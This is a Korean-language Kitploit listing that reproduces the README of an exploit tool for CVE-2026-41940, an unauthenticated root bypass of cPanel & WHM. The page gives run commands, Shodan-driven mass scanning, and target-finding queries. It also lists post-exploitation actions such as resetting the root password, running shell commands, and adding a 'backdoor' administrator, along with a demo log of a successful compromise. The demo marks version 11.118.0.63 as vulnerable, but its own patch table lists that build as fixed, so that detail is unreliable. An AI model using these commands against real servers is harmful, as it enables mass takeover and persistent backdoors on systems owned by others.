Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-41940 — cPanel & WHM - 세션 파일 CRLF 주입을 통한 인증 우회 | Kitploit
도구/GitHubGitHub/0xgh057r3c0n/cve-2026-41940
Authentication & AuthorizationVulnerability ScannersExploitationWeb Application ExploitationPost-ExploitationPenetration TestingRed Teaming
GitHub0xgh057r3c0n/cve-2026-41940

CVE-2026-41940

cPanel & WHM - 세션 파일 CRLF 주입을 통한 인증 우회

저장소 보기
110시간 20분 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

🔥 CVE-2026-41940 – cPanel 및 WHM 인증 우회

cPanel

⚡ 인증 없는 루트 – 세션 파일 CRLF 주입 ⚡
"모든 것을 지배하는 하나의 체인."

Python License No deps CVSS


🧠 익스플로잇 요약

root@kitploit:~
┌─────────────────────────────────────────────────────────────┐
│  1단계  ──  사전 인증 세션 쿠키 생성                       │
│  2단계  ──  `Authorization` 헤더를 통한 CRLF 주입          │
│  3단계  ──  `do_token_denied` 가젯 실행 (raw → cache)      │
│  4단계  ──  JSON API를 통한 WHM 루트 접근 검증             │
└─────────────────────────────────────────────────────────────┘

💥 결과 – 자격 증명 없이 WHM에 대한 완전한 루트 접근 권한 획득.


📜 라이선스

이 프로젝트는 MIT 라이선스로 배포됩니다 – 자유롭게 사용, 수정, 배포할 수 있지만, 악용하지 마세요 😈.
자세한 내용은 LICENSE 파일을 참조하세요.


🛠️ 설치 – 단 한 줄이면 끝

root@kitploit:~
git clone https://github.com/0xgh057r3c0n/CVE-2026-41940.git && cd CVE-2026-41940

의존성 제로 – Python 3 표준 라이브러리만 필요합니다.
pip, virtualenv 또는 그런 것들은 전혀 필요 없습니다.


🚀 빠른 시작 – 지금 바로 실행

단일 대상

root@kitploit:~
./CVE-2026-41940.py -u https://target.com:2087

파일에서 대량 스캔

root@kitploit:~
./CVE-2026-41940.py -l targets.txt -t 20 -o results.json

외부 도구에서 파이프로 전달 (Shodan, subfinder 등)

root@kitploit:~
shodan search --fields ip_str,port 'title:"WHM Login"' | \
  awk '{print "https://"$1":"$2}' | ./CVE-2026-41940.py -t 30

🎯 명령줄 옵션 (핵심 기능)


💀 사후 익스플로잇 무기고

대상 시스템을 장악한 후에는 다음을 수행할 수 있습니다:

  • 🔍 모든 cPanel 계정 나열 – --action list
  • 🔑 루트 비밀번호 변경 – --action passwd --passwd "h4ck3d!"
  • 🖥️ OS 명령어 실행 – --action cmd --cmd "id;whoami"
  • 📡 대화형 셸 – --action shell (전체 WHM 터미널)
  • 👤 백도어 관리자 생성 – --action adduser --new-user backdoor --new-domain evil.com --passwd "pwn3d"
  • 📂 파일 읽기 (셸을 통해) – cat /etc/passwd
  • 📊 서버 정보 수집 – --action info

🧪 데모 – 실행 결과 예시

root@kitploit:~
$ ./CVE-2026-41940.py -u https://192.168.1.100:2087

  구성:
   대상    : 1
   스레드  : 10
   제한시간: 15초
   작업    : 스캔 전용

[10:23:15] [SCAN] 4단계 익스플로잇 체인 시작... https://192.168.1.100:2087
[10:23:15] [INFO] 표준 호스트 이름 감지됨: server.example.com
[10:23:15] [STEP] 1/4단계 — 사전 인증 세션 생성 중...
[10:23:16] [  OK] 1단계: 사전 인증 세션 = 9a7f8e3d2c1b0a9f
[10:23:16] [STEP] 2/4단계 — Authorization 헤더를 통한 CRLF 주입 중...
[10:23:17] [  OK] 2단계: HTTP 302 → token=/cpsess1234567890
[10:23:17] [STEP] 3/4단계 — do_token_denied 가젯 실행 중 (raw→cache)...
[10:23:18] [  OK] 3단계: HTTP 401 — do_token_denied 가젯 실행됨
[10:23:18] [STEP] 4/4단계 — WHM 루트 접근 검증 중...
[10:23:18] [INFO] 4단계: HTTP 200  {"version":"11.118.0.63",...}
[10:23:18] [PWND] CVE-2026-41940 확인됨 — WHM 루트 접근 권한 획득! (v11.118.0.63 — 취약 버전 확인됨)
[10:23:18] [PWND]   토큰    : /cpsess1234567890
[10:23:18] [PWND]   세션    : 9a7f8e3d2c1b0a9f
[10:23:18] [PWND]   버전    : 11.118.0.63
[10:23:18] [PWND]   API URL : https://192.168.1.100:2087/cpsess1234567890/json-api/version

  CVE-2026-41940 — 스캔 완료
  시간: 3.2초  ·  대상: 1

  취약 대상 1개 발견

  [*] 대상    : https://192.168.1.100:2087
  [*] 버전    : 11.118.0.63
  [*] 토큰    : /cpsess1234567890
  [*] API URL : https://192.168.1.100:2087/cpsess1234567890/json-api/version
  [*] 세션    : 9a7f8e3d2c1b0a9f
  [*] 증거    : {"version":"11.118.0.63",...}

🔎 Shodan 검색어 (표적 찾기)

root@kitploit:~
title:"WHM Login"
title:"WebHost Manager" port:2087
product:"cPanel" port:2087

📊 영향받는 버전 – 패치 상태

위 빌드 미만의 모든 버전은 취약합니다.


🕵️‍♂️ 작성자 및 크레딧

0xgh057r3c0n – 보안 연구원, 리버스 엔지니어, 그리고 커피 중독자.
GitHub | Twitter


⚠️ 면책 조항

이 도구는 공인된 보안 테스트 및 교육 목적으로만 사용해야 합니다.
컴퓨터 시스템에 대한 무단 접근은 불법입니다. 작성자와 기여자는 이 소프트웨어로 인한 오용 또는 피해에 대해 책임을 지지 않습니다.
책임감 있게 사용하고, 항상 먼저 허가를 받으세요.


🌟 지원 / 기여

  • 버그를 발견하셨나요? 이슈를 등록하세요.
  • 코드를 개선하고 싶으신가요? PR은 언제나 환영합니다.
  • 도구가 마음에 드셨나요? GitHub에서 ⭐을 눌러주세요!

🔥 행성을 해킹하되, 합법적으로 하세요. 🔥

도구 다운로드
플래그설명
-u, --url단일 대상 URL (예: https://host:2087)
-l, --list한 줄에 URL 하나씩 포함된 파일
--hostname표준 Host 헤더 재정의 (자동 감지됨)
-t, --threads스레드 수 (기본값: 10)
--timeout제한 시간(초) (기본값: 15)
--rate-limit대상 간 대기 시간(초)
--action사후 익스플로잇: list, passwd, cmd, exec, info, version, shell, adduser
--passwd새 루트 비밀번호 (--action passwd와 함께 사용)
--cmdOS 명령어 (--action cmd/exec와 함께 사용)
--new-user새 cPanel 사용자 이름 (--action adduser와 함께 사용)
--new-domain새 cPanel 도메인 (--action adduser와 함께 사용)
-o, --output결과를 JSON으로 저장
브랜치패치된 빌드상태
11.11011.110.0.97🛡️ 수정됨
11.11811.118.0.63🛡️ 수정됨
11.12611.126.0.54🛡️ 수정됨
11.13211.132.0.29🛡️ 수정됨
11.13411.134.0.20🛡️ 수정됨
11.13611.136.0.5🛡️ 수정됨